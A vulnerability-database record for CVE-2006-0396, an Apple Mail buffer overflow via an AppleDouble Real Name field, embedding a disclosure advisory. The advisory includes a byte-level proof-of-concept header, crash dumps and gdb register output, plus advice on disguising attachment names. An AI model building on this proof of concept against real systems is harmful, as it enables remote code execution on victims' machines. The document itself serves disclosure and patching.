var-200603-0281
Vulnerability from variot
Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-001, allows remote attackers to execute arbitrary code via a long Real Name value in an e-mail attachment sent in AppleDouble format, which triggers the overflow when the user double-clicks on an attachment. Mac OS X Mail is prone to a remote buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer. A successful exploit may facilitate a compromise of the underlying computer. This issue is present in Apple Mail when 'Security Update 2006-001' is applied. An attacker can trigger this vulnerability by sending a specially crafted MIME-encapsulated Macintosh file containing an AppleDouble header. Download Validation is used to warn the user if the file type is not "safe". Prior to 2006-001 certain techniques could be used to disguise a file's type so that the validation was bypassed. Unfortunately in the process of patching the previous problem a new one was introduced.
After applying Security Update 2006-001 Mail.app becomes vulnerable to a buffer overflow that may be triggered via a properly formatted MIME Encapsuled Macintosh file. Sending a file in the AppleDouble format with a long Real Name entry will invoke the overflow. Reading through RFC1740 should provide enough information to trigger the issue. The overflow is triggered by the file that contains the AppleDouble header information.
The format of the header we need to send is as follows:
[4 byte magic num][4 byte version num][16 bytes of filler][2 byte num of entries][Entry...] Entry descriptor for each Entry: [4 byte entry id][4 byte offset][4 byte length]
Using the above layout we come up with the following code snippet for our exploit.
"\x00\x05\x16\x07". # AppleDouble Magic Number "\x00\x02\x00\x00". # Version 2 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". # 16 Bytes of filler "\x00\x03\x00\x00". # Number of entries (3) "\x00\x09\x00\x00". # Entry ID 9 is for 'Finder Info' "\x00\x3e\x00\x00". # Start of Finder Info data is at file offset 0x3e "\x00\x0a\x00\x00". # Length of Finder Info is 0x0a or 10 "\x00\x03\x00\x00". # Entry ID 3 is for 'Real Name' "\x00\x48\x00\x00". # Start of Real Name data is at file offset 0x48 "\x00\xf5\x00\x00". # Length of Real Name is 0xf5 or 245 "\x00\x02\x00\x00". # Entry ID 2 is for 'Resource Fork' "\x01\x3d\x00\x00". # Start of Resource Fork is at file offset 0x013d "\x05\x3a\x00\x00". # Length of Resource fork is 0x053a "\x00\x00\x00\x00". # filler "\x00\x00\x00\x00". # filler "A" x 226 . "$retaddr" x 3 . "zzz.mov." . # remember this length is hard coded above.
If a message with the above header arrived in your inbox on Mail.app you would see only the first 11 characters of the name provided by the Real Name entry. In this particular case you see "AAAAAAAAAAA...mov" . Other examples could be "SuperTastey...mov" or NakedChicks...mov" . The visual aspects of the (...) are surprisingly not that suspicious.
Upon double clicking the attached file on the arrived email the following dump is created.
Date/Time: 2006-03-04 10:35:32.472 -0500 OS Version: 10.4.5 (Build 8H14) Report Version: 4
Command: Mail Path: /Applications/Mail.app/Contents/MacOS/Mail Parent: WindowServer [64]
Version: 2.0.7 (746.2) Build Version: 1 Project Name: MailViewer Source Version: 7460200
PID: 271 Thread: 0
Exception: EXC_BAD_ACCESS (0x0001) Codes: KERN_INVALID_ADDRESS (0x0001) at 0x41414140
If we take a look at this in gdb we can see that several things are overwirtten. (gdb) bt
0 0x41424344 in ?? ()
Cannot access memory at address 0x41424344 Cannot access memory at address 0x31313131 Cannot access memory at address 0x41424344 Cannot access memory at address 0x41424344
1 0x41424344 in ?? ()
Cannot access memory at address 0x41424344 Cannot access memory at address 0x41424344 Cannot access memory at address 0x31313131 warning: Previous frame identical to this frame (corrupt stack?) Cannot access memory at address 0x41424344 Cannot access memory at address 0x41424344 Cannot access memory at address 0x31313139
We control r0, pc, lr and half of r31. (gdb) i r $r0 $pc $lr $r31 r0 0x41424344 1094861636 pc 0x41424344 1094861636 lr 0x41424344 1094861636 r31 0x18b3030 25899056
Exploitation of this issue seems possible however there are currently some limitations with regard to what can and can not be done.
The first issue involves previous exploitation attempts and the temporary files left behind by such attempts.
k-fs-ibook:~ test$ ls -al /var/tmp/folders.502/TemporaryItems/ ~/Library/Mail\ Downloads/ /Users/test/Library/Mail Downloads/: total 352 drwx------ 7 test admin 238 Mar 13 22:42 . drwx------ 23 test admin 782 Mar 12 15:52 .. drwx------ 3 test admin 102 Mar 13 22:42 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa0000 11112222ABCD3333zzz.mov.mailhold
/var/tmp/folders.502/TemporaryItems/: total 352 drwxr-xr-x 4 test wheel 136 Mar 13 22:38 . drwx------ 3 test wheel 102 Mar 12 10:35 .. -rwxr-xr-x 1 test wheel 90000 Mar 13 22:44 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa00001 1112222ABCD3333zzz.mov.mov
The existance of a particular temporary file can halt the actions of an exploit attempting to take advantage of this issue. While developing an exploit keeping the two folders shown above clean is critical! The temporary files appear to be created during the process of previewing a message. In some cases they may not be created due to failed mkstemp() calls.
The next issue centers around the fact that RFC1740 states that the Real Name entry can only contain 7bit printable ascii, using shellcode addresses with 0xff and 0xbf will not be possible because of this. This obviously eliminates alot of easy shellcode addresses unfortunately.
0xbfffe6e1: "Users/test/Library/Mail Downloads/", 'a' ... 0xbfffe7a9: 'a' , "00\032\xff\xf8"
Code in other areas seems to be either in an unreliable location or in a unicode format. I am really not in the mood to hunt around memory for a stable address but I am sure that something could be put together to exploit this.
Here is an example of the Unicode strings that can be found in memory at random places. (gdb) x/30a $r29 0x18b8a00: 0xa28e6424 0x12100000 0x2f0055 0x730065 0x18b8a10: 0x720073 0x2f0074 0x650073 0x74002f 0x18b8a20: 0x4c0069 0x620072 0x610072 0x79002f 0x18b8a30: 0x4d0061 0x69006c 0x200044 0x6f0077 0x18b8a40: 0x6e006c 0x6f0061 0x640073 0x2f0061 0x18b8a50: 0x610061 0x610061 0x610061 0x610061 0x18b8a60: 0x610061 0x610061 0x610061 0x610061 0x18b8a70: 0x610061 0x610061
On x86 the Unicode may not be a problem however I do not have access to an intel based mac so I can not confirm this. On PowerPC however for the time being there is not much I can do on the Unicode front. I am not aware of any Venetian style PowerPC lovin at the moment.
For the time being my exploitation has not gone beyond what I have documented here. Beyond the few hurdles I have outlined may lie a few more, but who knows? Good luck.
Work Around:
Install 2006-002 update or simply do not open attachments in Mail.app
http://www.apple.com/support/downloads/
Sidenote: Much thanks to Apple for the quick turnaround time and prompt weekend responses! A same day response and 9 day turn around is hard to beat
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200603-0281",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "mac os x",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.4.2"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.4"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.4.3"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.4.4"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.4.2"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.4.5"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.4.1"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.4.1"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.4.4"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.4.3"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "10.4.5"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "10.4"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "apple computer",
"version": null
},
{
"model": "mac os x",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "10.4 to 10.4.5"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "10.4 to 10.4.5"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.5"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.4"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.3"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.2"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.5"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.4"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.3"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.2"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#980084"
},
{
"db": "BID",
"id": "17081"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-003846"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-268"
},
{
"db": "NVD",
"id": "CVE-2006-0396"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:apple:mac_os_x",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:apple:mac_os_x_server",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-003846"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Kevin Finisterre dotslash@snosoft.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200603-268"
}
],
"trust": 0.6
},
"cve": "CVE-2006-0396",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 4.9,
"id": "CVE-2006-0396",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 4.9,
"id": "VHN-16504",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:H/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2006-0396",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#980084",
"trust": 0.8,
"value": "6.63"
},
{
"author": "NVD",
"id": "CVE-2006-0396",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-200603-268",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-16504",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2006-0396",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#980084"
},
{
"db": "VULHUB",
"id": "VHN-16504"
},
{
"db": "VULMON",
"id": "CVE-2006-0396"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-003846"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-268"
},
{
"db": "NVD",
"id": "CVE-2006-0396"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-001, allows remote attackers to execute arbitrary code via a long Real Name value in an e-mail attachment sent in AppleDouble format, which triggers the overflow when the user double-clicks on an attachment. Mac OS X Mail is prone to a remote buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer. A successful exploit may facilitate a compromise of the underlying computer. \nThis issue is present in Apple Mail when \u0027Security Update 2006-001\u0027 is applied. An attacker can trigger this vulnerability by sending a specially crafted MIME-encapsulated Macintosh file containing an AppleDouble header. Download Validation is used to warn the user if the file type is not \"safe\". Prior \nto 2006-001 certain techniques could be used to disguise a file\u0027s type so that the validation \nwas bypassed. Unfortunately in the process of patching the previous problem a new one was \nintroduced. \n\nAfter applying Security Update 2006-001 Mail.app becomes vulnerable to a buffer overflow that\nmay be triggered via a properly formatted MIME Encapsuled Macintosh file. Sending a file in \nthe AppleDouble format with a long Real Name entry will invoke the overflow. Reading through \nRFC1740 should provide enough information to trigger the issue. The overflow is triggered \nby the file that contains the AppleDouble header information. \n\nThe format of the header we need to send is as follows: \n\n[4 byte magic num][4 byte version num][16 bytes of filler][2 byte num of entries][Entry...]\nEntry descriptor for each Entry:\n[4 byte entry id][4 byte offset][4 byte length]\n\nUsing the above layout we come up with the following code snippet for our exploit. \n\n\"\\x00\\x05\\x16\\x07\". # AppleDouble Magic Number\n\"\\x00\\x02\\x00\\x00\". # Version 2\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \t# 16 Bytes of filler\n\"\\x00\\x03\\x00\\x00\". # Number of entries (3)\n\"\\x00\\x09\\x00\\x00\". # Entry ID 9 is for \u0027Finder Info\u0027\n\"\\x00\\x3e\\x00\\x00\". # Start of Finder Info data is at file offset 0x3e\n\"\\x00\\x0a\\x00\\x00\". # Length of Finder Info is 0x0a or 10\n\"\\x00\\x03\\x00\\x00\". # Entry ID 3 is for \u0027Real Name\u0027\n\"\\x00\\x48\\x00\\x00\". # Start of Real Name data is at file offset 0x48\n\"\\x00\\xf5\\x00\\x00\". # Length of Real Name is 0xf5 or 245\n\"\\x00\\x02\\x00\\x00\". # Entry ID 2 is for \u0027Resource Fork\u0027\n\"\\x01\\x3d\\x00\\x00\". # Start of Resource Fork is at file offset 0x013d\n\"\\x05\\x3a\\x00\\x00\". # Length of Resource fork is 0x053a\n\"\\x00\\x00\\x00\\x00\". # \u003cnull\u003e filler\n\"\\x00\\x00\\x00\\x00\". # \u003cnull\u003e filler\n\"A\" x 226 . \"$retaddr\" x 3 . \"zzz.mov.\" . # remember this length is hard coded above. \n\nIf a message with the above header arrived in your inbox on Mail.app you would see only the\nfirst 11 characters of the name provided by the Real Name entry. In this particular case you \nsee \"AAAAAAAAAAA...mov\" . Other examples could be \"SuperTastey...mov\" or NakedChicks...mov\" . \nThe visual aspects of the (...) are surprisingly not that suspicious. \n\nUpon double clicking the attached file on the arrived email the following dump is created. \n\nDate/Time: 2006-03-04 10:35:32.472 -0500\nOS Version: 10.4.5 (Build 8H14)\nReport Version: 4\n\nCommand: Mail\nPath: /Applications/Mail.app/Contents/MacOS/Mail\nParent: WindowServer [64]\n\nVersion: 2.0.7 (746.2)\nBuild Version: 1\nProject Name: MailViewer\nSource Version: 7460200\n\nPID: 271\nThread: 0\n\nException: EXC_BAD_ACCESS (0x0001)\nCodes: KERN_INVALID_ADDRESS (0x0001) at 0x41414140\n\nIf we take a look at this in gdb we can see that several things are overwirtten. \n(gdb) bt\n#0 0x41424344 in ?? ()\nCannot access memory at address 0x41424344\nCannot access memory at address 0x31313131\nCannot access memory at address 0x41424344\nCannot access memory at address 0x41424344\n#1 0x41424344 in ?? ()\nCannot access memory at address 0x41424344\nCannot access memory at address 0x41424344\nCannot access memory at address 0x31313131\nwarning: Previous frame identical to this frame (corrupt stack?)\nCannot access memory at address 0x41424344\nCannot access memory at address 0x41424344\nCannot access memory at address 0x31313139\n\nWe control r0, pc, lr and half of r31. \n(gdb) i r $r0 $pc $lr $r31\nr0 0x41424344 1094861636\npc 0x41424344 1094861636\nlr 0x41424344 1094861636\nr31 0x18b3030 25899056\n\nExploitation of this issue seems possible however there are currently some limitations \nwith regard to what can and can not be done. \n\nThe first issue involves previous exploitation attempts and the temporary files left \nbehind by such attempts. \n\nk-fs-ibook:~ test$ ls -al /var/tmp/folders.502/TemporaryItems/ ~/Library/Mail\\ Downloads/\n/Users/test/Library/Mail Downloads/:\ntotal 352\ndrwx------ 7 test admin 238 Mar 13 22:42 . \ndrwx------ 23 test admin 782 Mar 12 15:52 .. \ndrwx------ 3 test admin 102 Mar 13 22:42 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa0000\n11112222ABCD3333zzz.mov.mailhold\n\n/var/tmp/folders.502/TemporaryItems/:\ntotal 352\ndrwxr-xr-x 4 test wheel 136 Mar 13 22:38 . \ndrwx------ 3 test wheel 102 Mar 12 10:35 .. \n-rwxr-xr-x 1 test wheel 90000 Mar 13 22:44 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa00001\n1112222ABCD3333zzz.mov.mov\n\nThe existance of a particular temporary file can halt the actions of an exploit attempting \nto take advantage of this issue. While developing an exploit keeping the two folders shown \nabove clean is critical! The temporary files appear to be created during the process of \npreviewing a message. In some cases they may not be created due to failed mkstemp() calls. \n\nThe next issue centers around the fact that RFC1740 states that the Real Name entry can \nonly contain 7bit printable ascii, using shellcode addresses with 0xff and 0xbf will not\nbe possible because of this. This obviously eliminates alot of easy shellcode addresses \nunfortunately. \n\n0xbfffe6e1: \"Users/test/Library/Mail Downloads/\", \u0027a\u0027 \u003crepeats 166 times\u003e... \n0xbfffe7a9: \u0027a\u0027 \u003crepeats 52 times\u003e, \"00\\032\\xff\\xf8\"\n\nCode in other areas seems to be either in an unreliable location or in a unicode format. \nI am really not in the mood to hunt around memory for a stable address but I am sure that\nsomething could be put together to exploit this. \n\nHere is an example of the Unicode strings that can be found in memory at random places. \n(gdb) x/30a $r29\n0x18b8a00: 0xa28e6424 0x12100000 0x2f0055 0x730065\n0x18b8a10: 0x720073 0x2f0074 0x650073 0x74002f\n0x18b8a20: 0x4c0069 0x620072 0x610072 0x79002f\n0x18b8a30: 0x4d0061 0x69006c 0x200044 0x6f0077\n0x18b8a40: 0x6e006c 0x6f0061 0x640073 0x2f0061\n0x18b8a50: 0x610061 0x610061 0x610061 0x610061\n0x18b8a60: 0x610061 0x610061 0x610061 0x610061\n0x18b8a70: 0x610061 0x610061\n\nOn x86 the Unicode *may* not be a problem however I do not have access to an intel based\nmac so I can not confirm this. On PowerPC however for the time being there is not much \nI can do on the Unicode front. I am not aware of any Venetian style PowerPC lovin at the \nmoment. \n\nFor the time being my exploitation has not gone beyond what I have documented here. Beyond \nthe few hurdles I have outlined may lie a few more, but who knows? Good luck. \n\nWork Around: \nInstall 2006-002 update or simply do not open attachments in Mail.app \nhttp://www.apple.com/support/downloads/\n\nSidenote:\nMuch thanks to Apple for the quick turnaround time and prompt weekend responses! A same\nday response and 9 day turn around is hard to beat",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-0396"
},
{
"db": "CERT/CC",
"id": "VU#980084"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-003846"
},
{
"db": "BID",
"id": "17081"
},
{
"db": "VULHUB",
"id": "VHN-16504"
},
{
"db": "VULMON",
"id": "CVE-2006-0396"
},
{
"db": "PACKETSTORM",
"id": "44647"
}
],
"trust": 2.88
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-16504",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=1583",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-16504"
},
{
"db": "VULMON",
"id": "CVE-2006-0396"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#980084",
"trust": 3.4
},
{
"db": "NVD",
"id": "CVE-2006-0396",
"trust": 3.0
},
{
"db": "SECUNIA",
"id": "19129",
"trust": 2.6
},
{
"db": "BID",
"id": "17081",
"trust": 2.1
},
{
"db": "SECTRACK",
"id": "1015762",
"trust": 1.8
},
{
"db": "VUPEN",
"id": "ADV-2006-0949",
"trust": 1.8
},
{
"db": "OSVDB",
"id": "23872",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2006-003846",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200603-268",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20060314 DMA[2006-0313A] - \u0027APPLE OSX MAIL.APP RFC1740 REAL NAME BUFFER OVERFLOW\u0027",
"trust": 0.6
},
{
"db": "APPLE",
"id": "APPLE-SA-2006-03-13",
"trust": 0.6
},
{
"db": "XF",
"id": "25209",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "1583",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-16504",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2006-0396",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "44647",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#980084"
},
{
"db": "VULHUB",
"id": "VHN-16504"
},
{
"db": "VULMON",
"id": "CVE-2006-0396"
},
{
"db": "BID",
"id": "17081"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-003846"
},
{
"db": "PACKETSTORM",
"id": "44647"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-268"
},
{
"db": "NVD",
"id": "CVE-2006-0396"
}
]
},
"id": "VAR-200603-0281",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-16504"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T21:03:29.802000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "17081",
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/17081"
},
{
"title": "id?1015762",
"trust": 0.8,
"url": "http://securitytracker.com/id?1015762"
},
{
"title": "19129",
"trust": 0.8,
"url": "http://secunia.com/advisories/19129"
},
{
"title": "article",
"trust": 0.8,
"url": "http://docs.info.apple.com/article.html?artnum=303453"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-003846"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-0396"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.9,
"url": "http://docs.info.apple.com/article.html?artnum=303453"
},
{
"trust": 2.7,
"url": "http://www.kb.cert.org/vuls/id/980084"
},
{
"trust": 1.8,
"url": "http://lists.apple.com/archives/security-announce/2006/mar/msg00001.html"
},
{
"trust": 1.8,
"url": "http://www.securityfocus.com/bid/17081"
},
{
"trust": 1.8,
"url": "http://www.digitalmunition.com/dma%5b2006-0313a%5d.txt"
},
{
"trust": 1.8,
"url": "http://www.osvdb.org/23872"
},
{
"trust": 1.8,
"url": "http://securitytracker.com/id?1015762"
},
{
"trust": 1.8,
"url": "http://secunia.com/advisories/19129"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/archive/1/427601/100/0/threaded"
},
{
"trust": 1.2,
"url": "http://www.vupen.com/english/advisories/2006/0949"
},
{
"trust": 1.2,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25209"
},
{
"trust": 0.9,
"url": "http://www.digitalmunition.com/dma[2006-0313a].txt"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-0396"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/19129/"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2006-0396"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2006/0949"
},
{
"trust": 0.6,
